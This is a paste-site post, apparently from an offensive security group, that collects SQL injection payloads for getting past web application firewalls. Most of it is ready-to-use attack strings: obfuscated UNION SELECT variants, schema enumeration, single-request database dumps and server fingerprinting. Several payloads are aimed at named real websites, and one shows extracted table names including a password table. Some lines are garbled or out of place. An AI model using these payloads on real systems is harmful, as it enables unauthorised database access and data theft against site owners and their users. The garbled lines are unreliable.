RedBirdTeam

SQL INJECTION | WAF Bypass

Aug 8th, 2019
  1.  
  2. _____ ____ _ _____ _ _ _ ______ _____ _______ _____ ____ _ _
  3. / ____|/ __ \| | |_ _| \ | | | | ____/ ____|__ __|_ _/ __ \| \ | |
  4. | (___ | | | | | | | | \| | | | |__ | | | | | || | | | \| |
  5. \___ \| | | | | | | | . ` |_ | | __|| | | | | || | | | . ` |
  6. ____) | |__| | |____ _| |_| |\ | |__| | |___| |____ | | _| || |__| | |\ |
  7. |_____/ \___\_\______| |_____|_|_\_|\____/|______\_____| |_| |_____\____/|_| \_|
  8. \ \ / /\ | ____| | _ \
  9. \ \ /\ / / \ | |__ | |_) |_ _ _ __ __ _ ___ ___
  10. \ \/ \/ / /\ \ | __| | _ <| | | | '_ \ / _` / __/ __|
  11. \ /\ / ____ \| | | |_) | |_| | |_) | (_| \__ \__ \
  12. \/ \/_/ \_\_| |____/ \__, | .__/ \__,_|___/___/
  13. __/ | |
  14. |___/|_| [RedBird Offensive Security]
  15.  
  16.  
  17. Métodos de evasión WAF para inyecciones sql
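  18. Quiero compartir métodos de evasión de WAF para inyecciones SQL. La mayoría son antiguos, aunque algunos son más recientes. Con estos métodos se puede evitar la mayoría de los errores "404 prohibido" y "NO aceptable". Todas las variantes siguientes se apoyan en lo mismo: el filtro compara la petición con patrones literales, mientras que el servidor y la base de datos decodifican la entrada e ignoran mayúsculas y comentarios antes de ejecutarla; por eso un WAF basado en firmas no sustituye a las consultas parametrizadas en la aplicación.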
  19.  
  20. -------------------------------------------------------------------------------------------------------------------------------
  21.  
  22. 1) id=1+UnIoN+SeLecT 1,2,3 --+
  23.  
  24. 2) id=1+UnIOn/**/SeLect 1,2,3 --+
  25.  
  26. 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
  27.  
  28. 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
  29.  
  30. 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
  31.  
  32. 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
  33.  
  34. 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
  35.  
  36. 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
  37.  
  38. /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  39.  
  40. 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  41.  
  42. div + 0
  43. Having +1 = 0
  44. AND+ 1 = 0
  45. /*!and*/ +1 = 0
  46. and( 1 )=(0 ) x
  47. OR false the url query
  48. id =- 1 union all select
  49. id =null union all select
  50. id =1 +and+ false + union +all +select
  51. id = 9999 union all select
  52.  
  53. +union+distinct+select+
  54. +union+distinctROW+select+
  55. /**//*!12345UNION SELECT*//**/
  56. /**//*!50000UNION SELECT*//
  57.  
  58. http : //www.xxx.com/project.php?cat=Conservation'
  59. +and(1)=(0) +union+distinct+select+ 1
  60. and use: and 1=0 to apear column number in the page
  61. or
  62. +div+0
  63. Having+1=0
  64. +AND+1=0
  65. +/*!and*/+1=0
  66. and(1)=(0‏)
  67.  
  68. Hard WAF bypass tips
  69. Whitespaces :
  70. union(select(0),version(),(0),(0),(0),(0),(0),(0),
  71. (0))
  72. %0Aunion%0Aselect%0A1,2,3--
  73. /**/union/**/select/**/1,2,3--
  74. like ::
  75. PHP Code:
  76. http ://www.xxx.com/
  77. list_itinerary.php?id=-4%20union
  78. %20%28select%201,2,version
  79. %28%29,4,5,6,7,8%29%20--
  80. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  81. NICE QUERY
  82. www.xxx.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
  83.  
  84. www.xxx.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
  85. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  86. Bypassing ::
  87. (Double Keyword): UNIunionON+SELselectECT
  88. +union+distinct+select+
  89. +union+distinctROW+select+
  90. union+/*!select*/+1,2,3
  91. union/**/select/**/1,2,3
  92. uni<on all sel<ect
  93. %20union%20/*!select*/%20
  94. /**//*!union*//**//*!select*//**/
  95. union%23aa%0Aselect
  96. /**/union/*!50000select*/
  97. /*!20000%0d%0aunion*/+/*!20000%0d
  98. %0aSelEct*/
  99. %252f%252a*/UNION%252f%252a /SELECT%252f
  100. %252a*/
  101. +%23sexsexsex%0AUnIOn%23sexsexsex
  102. %0ASeLecT+
  103. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  104. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  105. like ::
  106. PHP Code:
  107. http ://www.xxx.com/
  108. list_itinerary.php?id=-4%20union
  109. %23aa%0Aselect%201,2,version
  110. %28%29,4,5,6,7,8%20--
  111. PHP Code:
  112. http ://www.xxx.com/
  113. list_itinerary.php?id=-4%20/**/
  114. union/*!50000select*/
  115. %201,2,version
  116. %28%29,4,5,6,7,8%20--
  117. PHP Code:
  118. http ://www.xxx.com/
  119. list_itinerary.php?id=-4%20/*!
  120. 20000%0d%0aunion*/+/*!20000%0d
  121. %0aSelEct*/%201,2,version
  122. %28%29,4,5,6,7,8%20--
  123. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  124. after id no. like id=1 +/*!and*/+1=0
  125. +div+0
  126. Having+1=0
  127. +AND+1=0
  128. +/*!and*/+1=0
  129. and(1)=(0)
  130. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  131. false the url query :
  132. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  133. id= - 1 union all select
  134. id= null union all select
  135. id=1 +and+false+ union+all+select
  136. id= 9999 union all select
  137. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  138. Order Bypassing do like this
  139. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  140. /*!table_name*/
  141. +from /*!information_schema*/./*!tables*/ where
  142. table_schema=database()
  143. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  144. unhex(hex(Concat
  145. (Column_Name,0x3e,Table_schema,0x3e,table_
  146. Name)))
  147. /*!from*/information_schema.columns/*!where*/
  148. column_name%20/*!like*/char(37,%20112,%2097,
  149. %20115,%20115,%2037)
  150. like ::
  151. PHP Code:
  152. http ://www.westbury.com/
  153. article.php?
  154. article_id=-117%20union%20select
  155. %201,2,unhex%28hex%28Concat
  156. %28Column_Name,0x3e,Table_
  157. schema, 0x3e,table_Name
  158. %29%29%29,4,5,6,7/*!from*/
  159. information_schema.columns/*!
  160. where*/column_name%20/*!like*/
  161. char%2837,%20112,%2097,%20115,
  162. %20115,%2037%29--
  163. user_passwd>westbur6_website>user_info
  164. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  165. used with order ::
  166. convert( using ascii) or unhex(hex())
  167. like :
  168. PHP Code:
  169. www. westbury. com/ article. php?
  170. article_id =- 117 union select 1 , 2 ,
  171. convert ( group_concat
  172. (table_name ) using ascii ), 4 , 5 ,6 , 7 +
  173. from +information_schema .tables --
  174. If 'ascii' doesn't work, you can try:
  175. PHP Code:
  176. ujis
  177. ucs2
  178. tis620
  179. swe7
  180. sjis
  181. macroman
  182. macce
  183. latin7
  184. latin5
  185. latin2
  186. koi8u
  187. koi8r
  188. keybcs2
  189. hp8
  190. geostd8
  191. gbk
  192. gb2132
  193. armscii8
  194. ascii
  195. binary
  196. cp1250
  197. big5
  198. cp1251
  199. cp1256
  200. cp1257
  201. cp850
  202.  
  203. ------------------------------Best Bypass WAF------------------------------------
  204.  
  205. [~] order by [~]
  206. /**/ORDER/**/BY/**/
  207. /*!order*/+/*!by*/
  208. /*!ORDER BY*/
  209. /*!50000ORDER BY*/
  210. /*!50000ORDER*//**//*!50000BY*/
  211. /*!12345ORDER*/+/*!BY*/
  212.  
  213. [~] UNION select [~]
  214. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  215. %55nion(%53elect 1,2,3)-- -
  216. +union+distinct+select+
  217. +union+distinctROW+select+
  218. /**//*!12345UNION SELECT*//**/
  219. /**//*!50000UNION SELECT*//**/
  220. /**/UNION/**//*!50000SELECT*//**/
  221. /*!50000UniON SeLeCt*/
  222. union /*!50000%53elect*/
  223. + #?uNiOn + #?sEleCt
  224. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  225. /*!%55NiOn*/ /*!%53eLEct*/
  226. /*!u%6eion*/ /*!se%6cect*/
  227. +un/**/ion+se/**/lect
  228. uni%0bon+se%0blect
  229. %2f**%2funion%2f**%2fselect
  230. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  231. REVERSE(noinu)+REVERSE(tceles)
  232. /*--*/union/*--*/select/*--*/
  233. union (/*!/**/ SeleCT */ 1,2,3)
  234. /*!union*/+/*!select*/
  235. union+/*!select*/
  236. /**/union/**/select/**/
  237. /**/uNIon/**/sEleCt/**/
  238. +%2F**/+Union/*!select*/
  239. /**//*!union*//**//*!select*//**/
  240. /*!uNIOn*/ /*!SelECt*/
  241. +union+distinct+select+
  242. +union+distinctROW+select+
  243. uNiOn aLl sElEcT
  244. UNIunionON+SELselectECT
  245. /**/union/*!50000select*//**/
  246. 0%a0union%a0select%09
  247. %0Aunion%0Aselect%0A
  248. %55nion/**/%53elect
  249. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  250. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  251. %0A%09UNION%0CSELECT%10NULL%
  252. /*!union*//*--*//*!all*//*--*//*!select*/
  253. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  254. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  255. +UnIoN/*&a=*/SeLeCT/*&a=*/
  256. union+sel%0bect
  257. +uni*on+sel*ect+
  258. +#1q%0Aunion all#qa%0A#%0Aselect
  259. union(select (1),(2),(3),(4),(5))
  260. UNION(SELECT(column)FROM(table))
  261. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  262. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  263. union(select(1),2,3)
  264. union (select 1111,2222,3333)
  265. uNioN (/*!/**/ SeleCT */ 11)
  266. union (select 1111,2222,3333)
  267. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  268. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  269. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  270. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  271. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  272. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  273. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  274. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  275. /union\sselect/g
  276. /union\s+select/i
  277. /*!UnIoN*/SeLeCT
  278. +UnIoN/*&a=*/SeLeCT/*&a=*/
  279. +uni>on+sel>ect+
  280. +(UnIoN)+(SelECT)+
  281. +(UnI)(oN)+(SeL)(EcT)
  282. +’UnI”On’+'SeL”ECT’
  283. +uni on+sel ect+
  284. +/*!UnIoN*/+/*!SeLeCt*/+
  285. /*!u%6eion*/ /*!se%6cect*/
  286. uni%20union%20/*!select*/%20
  287. union%23aa%0Aselect
  288. /**/union/*!50000select*/
  289. /^.*union.*$/ /^.*select.*$/
  290. /*union*/union/*select*/select+
  291. /*uni X on*/union/*sel X ect*/
  292. +un/**/ion+sel/**/ect+
  293. +UnIOn%0d%0aSeleCt%0d%0a
  294. UNION/*&test=1*/SELECT/*&pwn=2*/
  295. un?<ion sel="">+un/**/ion+se/**/lect+
  296. +UNunionION+SEselectLECT+
  297. +uni%0bon+se%0blect+
  298. %252f%252a*/union%252f%252a /select%252f%252a*/
  299. /%2A%2A/union/%2A%2A/select/%2A%2A/
  300. %2f**%2funion%2f**%2fselect%2f**%2f
  301. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  302. /*!UnIoN*/SeLecT+
  303.  
  304. [~] information_schema.tables [~]
  305. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  306. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  307. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  308. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  309. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  310. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  311.  
  312. [~] concat() [~]
  313. CoNcAt()
  314. concat()
  315. CON%08CAT()
  316. CoNcAt()
  317. %0AcOnCat()
  318. /**//*!12345cOnCat*/
  319. /*!50000cOnCat*/(/*!*/)
  320. unhex(hex(concat(table_name)))
  321. unhex(hex(/*!12345concat*/(table_name)))
  322. unhex(hex(/*!50000concat*/(table_name)))
  323.  
  324. [~] group_concat() [~]
  325. /*!group_concat*/()
  326. gRoUp_cOnCAt()
  327. group_concat(/*!*/)
  328. group_concat(/*!12345table_name*/)
  329. group_concat(/*!50000table_name*/)
  330. /*!group_concat*/(/*!12345table_name*/)
  331. /*!group_concat*/(/*!50000table_name*/)
  332. /*!12345group_concat*/(/*!12345table_name*/)
  333. /*!50000group_concat*/(/*!50000table_name*/)
  334. /*!GrOuP_ConCaT*/()
  335. /*!12345GroUP_ConCat*/()
  336. /*!50000gRouP_cOnCaT*/()
  337. /*!50000Gr%6fuP_c%6fnCAT*/()
  338. unhex(hex(group_concat(table_name)))
  339. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  340. unhex(hex(/*!12345group_concat*/(table_name)))
  341. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  342. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  343. unhex(hex(/*!50000group_concat*/(table_name)))
  344. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  345. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  346. convert(group_concat(table_name)+using+ascii)
  347. convert(group_concat(/*!table_name*/)+using+ascii)
  348. convert(group_concat(/*!12345table_name*/)+using+ascii)
  349. convert(group_concat(/*!50000table_name*/)+using+ascii)
  350. CONVERT(group_concat(table_name)+USING+latin1)
  351. CONVERT(group_concat(table_name)+USING+latin2)
  352. CONVERT(group_concat(table_name)+USING+latin3)
  353. CONVERT(group_concat(table_name)+USING+latin4)
  354. CONVERT(group_concat(table_name)+USING+latin5)
  355. Group_Concat
  356. group_concat ()
  357. /*!group_concat*/ ()
  358. grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
  359. group_concat (, 0x3c62723e )
  360. g % 72oup_c % 6Fncat % 28 % 76% 65rsion
  361. % 28 %29 ,% 22 ~ BlackRose% 22 %29
  362. CoNcAt ()
  363. CONCAT (DISTINCT Version ())
  364. concat (, 0x3a ,)
  365. concat %00 ()
  366. % 00CoNcAt ()
  367. /*!50000cOnCat*/ ( /*!Version()*/ )
  368. /*!50000cOnCat*/
  369. /**//*!12345cOnCat*/ (, 0x3a ,)
  370. concat_ws ()
  371. concat (0x3a ,, 0x3c62723e )
  372. /*!concat_ws(0x3a,)*/
  373. concat_ws ( 0x3a3a3a , version()
  374. CONCAT_WS ( CHAR ( 32, 58, 32 ), version
  375. (),)
  376. REVERSE( tacnoc )
  377. binary (version ())
  378. uncompress (compress ( version()))
  379. aes_decrypt ( aes_encrypt ( version
  380. (), 1), 1 )
  381.  
  382. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  383. +div+0
  384. Having+1=0
  385. +AND+1=0
  386. +/*!and*/+1=0
  387. and(1)=(0)
  388. cp852
  389. cp866
  390. cp932
  391. dec8
  392. euckr
  393. latin1
  394. utf8
  395. trick to appear info inside img tag
  396. PHP Code:
  397. concat( 0x223e3c62723e ,, 0x3c696d
  398. 67207372633d22 )
  399. when the column is get into html tag,but its not
  400. always inside img tag.
  401. it could be <a> or </noscript> or anything.
  402. like ::
  403. PHP Code:
  404. http ://fzszy.chinacourt.org/
  405. public/detail.php?
  406. id=-168' union /*!
  407. %53elect*/ concat
  408. (0x223e3c2f613e3c2f74643e,
  409. version
  410. (),0x3c6120687265663d22)--+
  411.  
  412. [DUMP DB in 1 Request]
  413. PHP Code:
  414. ( select (@) from ( select(@:= 0x00 ),
  415. ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
  416. (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
  417. ( select(@) from ( select (@:= 0x00 ),
  418. ( select (@) from ( table ) where (@) in (@:= concat
  419. (@, 0x0a , column1 , 0x3a , column2 )))) a )
  420.  
  421. [DUMP DB in 1 Request improve]
  422. PHP Code:
  423. ( select(@ x ) from (select (@x := 0x00 ),
  424. ( select( 0 ) from
  425. ( information_schema . columns) where
  426. ( table_schema !
  427. = 0x696e666f726d6174696f6e5f736368656d61 )and
  428. ( 0x00 ) in(@ x := concat
  429. (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
  430. like
  431. http : //www.marinaplast.com/page.php?
  432. id=-13 union select 1,2,(select
  433. (@x)from(select(@x:=0x00),(select
  434. (0)from(information_schema.colu​​
  435. mns)where(table_schema!
  436. =0x696e666f726d6174696f6e5f736368656d61)and
  437. (0x00)in(@x:=​c​oncat
  438. (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
  439.  
  440. WHITESPACES BYPASS .
  441. %09 %0A %0B %0C %0D %A0
  442. get version - DB_NAME - user - HOST_NAME -
  443. datadir
  444. PHP Code:
  445. version()
  446. convert( version() using latin1 )
  447. unhex ( hex( version()))
  448. @@GLOBAL. VERSION
  449. ( substr
  450. (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
  451. # like #
  452. www. marinaplast. com/ page . php?
  453. id =- 13 union select 1 , 2 ,( substr
  454. (@@version ,1 , 1 )=5 ), 4, 5 --
  455. 1 means version 5 and 0 means version 4
  456. +and substring(version(),1,1)=4
  457. +and substring(version(),1,1)=5
  458. +and substring(version(),1,1)=9
  459. +and substring(version(),1,1)=10
  460. # like #
  461. www.marinaplast.com/page.php?
  462. id=13+and substring(version
  463. (),1,1)=5
  464. download good version 5
  465. www.marinaplast.com/page.php?
  466. id=13+and substring(version
  467. (),1,1)=4
  468. not download good version 4
  469. version 5
  470. id=1 /*!50094aaaa*/ error
  471. id=1 /*!50095aaaa*/ no error
  472. id=1 /*!50096aaaa*/ error
  473. # like #
  474. www.marinaplast.com/page.php?id=13 /
  475. *!50095aaaa*/ no error v5
  476. version 4
  477. id=1 /*!40123 1=1*/--+- no error
  478. id=1 /*!40122rrrr*/ no error
  479. # like #
  480. www.marinaplast.com/page.php?id=13 /
  481. *!40122rrrr*/ error not v4
  482. ☆¸.•*☆ ☆*•.¸☆
  483. DB_NAME()
  484. @@database
  485. database()
  486. id=vv()
  487. # like #
  488. www.marinaplast.com/page.php?
  489. id=-13 union select 1,2,DB_NAME
  490. (),4,5 --
  491. www.marinaplast.com/page.php?id=vv
  492. ()
  493. ☆¸.•*☆ ☆*•.¸☆
  494. @@user
  495. user()
  496. user_name()
  497. system_user()
  498. # like #
  499. www.marinaplast.com/page.php?
  500. id=-13 union select 1,2,user
  501. (),4,5 --
  502. ☆¸.•*☆ ☆*•.¸☆
  503. HOST_NAME()
  504. @@hostname
  505. @@servername
  506. SERVERPROPERTY()
  507. # like #
  508. www.marinaplast.com/page.php?
  509. id=-13 union select 1,2,HOST_NAME
  510. (),4,5 --
  511. ☆¸.•*☆ ☆*•.¸☆
  512. @@datadir
  513. datadir()
  514. # like #
  515. www.marinaplast.com/page.php?
  516. id=-13 union select 1,2,datadir(),4,5 --
  517. ☆¸.•*☆ ☆*•.¸☆
  518. ASPX
  519. and 1=0/@@version
  520. ' and 1 =0 /@@ version;--
  521. ) and 1 =@@version--
  522. and 1 = 0 /user ;--